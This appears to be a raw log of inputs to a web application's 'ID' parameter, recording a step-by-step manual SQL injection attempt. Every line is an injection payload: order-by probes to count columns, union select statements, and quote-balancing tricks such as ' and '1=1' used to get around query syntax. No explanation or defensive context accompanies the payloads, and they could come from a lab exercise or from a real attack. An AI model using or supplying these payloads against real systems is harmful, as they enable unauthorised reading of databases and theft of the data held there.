ID:1
ID:1 order by 3  
ID:1 order by 4  
ID:1 order by 5  
ID:1 order by 6  
ID:1 order by 6  
ID:-1 order by 6  
ID:-1 order by 1  
ID:-1 union select 1,2,3  
ID:-1 union select 1,2,3,4  
ID:\
ID:1' union select 1,2,3  
ID:-1' union select 1,2,3  
ID:-1' union select 1,2,3,4,5,6  
ID:1' order by 2   
ID:1'    
ID:1'    
ID:1'    
ID:1\
ID:1'  
ID:1'  
ID:1' fasfd
ID:1' fasfd
ID:1' order by 1 and '1=1
ID:1' order by 2 and '1=1
ID:1' order by 4and '1=1
ID:1' order by 4 and '1=1
ID:1' order by 90 and '1=1
ID:1' order by 90 and '1=1
ID:1' union select 1,2,3 and '1=1
ID:-1' union select 1,2,3 and '1=1
ID:-1' union select 1,2,3 and '1
ID:-1' union select 1,2,3 and '1
ID:-1' union select 1,2,3 and '
ID:-1' union select 1,2,3 and '1=1
ID:-1' union select 1,2,3 and '1=2
ID:-1' union select 1,2,3 and '1=2
ID:-1' union select 1,2,3 and '1=2
ID:-1' union select 1,2,3 and '1=2
ID:-1' union select 1,2,3 and '1=2
ID:-1' union select 1,2,3 and '1=3
ID:-1' union select 1,2,3 and '1=3
ID:-1' union select 1,2,3 and '1=3
ID:-1' union select 1,2,3 and '1=3
ID:-1' union select 1,2,3 and '1=3
ID:-1' union select 1,2,3 and '1==3
ID:-1' union select 1,2,3 and '1=1
ID:-1' union select 1,2,3 and '2
ID:-1' union select 1,2,3 and '3
ID:-1' union select 1,2,3 and '1==1
ID:-1' union select 1,2,3 and '1=1
ID:-1' union select 1,3 and '1=1
ID:-1' union select 1,2,3,3 and '1=1
ID:-1' union select 1,2,3 and '1=1
ID:-1' union select 1,2,3 and '1=1
ID:-1' union select 1,2,3 and '1=1
ID:-1' union select 1,2,3 where '1=1
ID:-1' union select 1,2,3 where 1=1 and '1=1
ID:-1' union select 1,2,3 where true and '1=1
ID:-1' union select 1,2,3 where1 and '1=1
ID:-1' union select 1,2,3 where 1 and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  where '1=1and '1=1
ID:-1' union select 1,2,3  where '1=1' and '1=1
ID:-1' union select 1,2,3  where '2=1' and '1=1
ID:-1' union select 1,2,3  where '2=2' and '1=1
ID:-1' union select 1,2,3  where 2=2 and '1=1
ID:-1' union select 1,2,3  and 1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=0
ID:-1' union select 1,2,3  and '1
ID:-1' union select 1,2,3  and '
ID:-1' union select 4,2,3  and '1
ID:-1' union select 1,2,'anything'  and '1
ID:-1' union select 1,2,'1' and '1
ID:-1' union select 3,2,'1' and '1
ID:-1' union select 3,2,1 and '1
ID:\
ID:-1' union select 1,2,3  '1=1
ID:-1' union select 1,2,3  '1
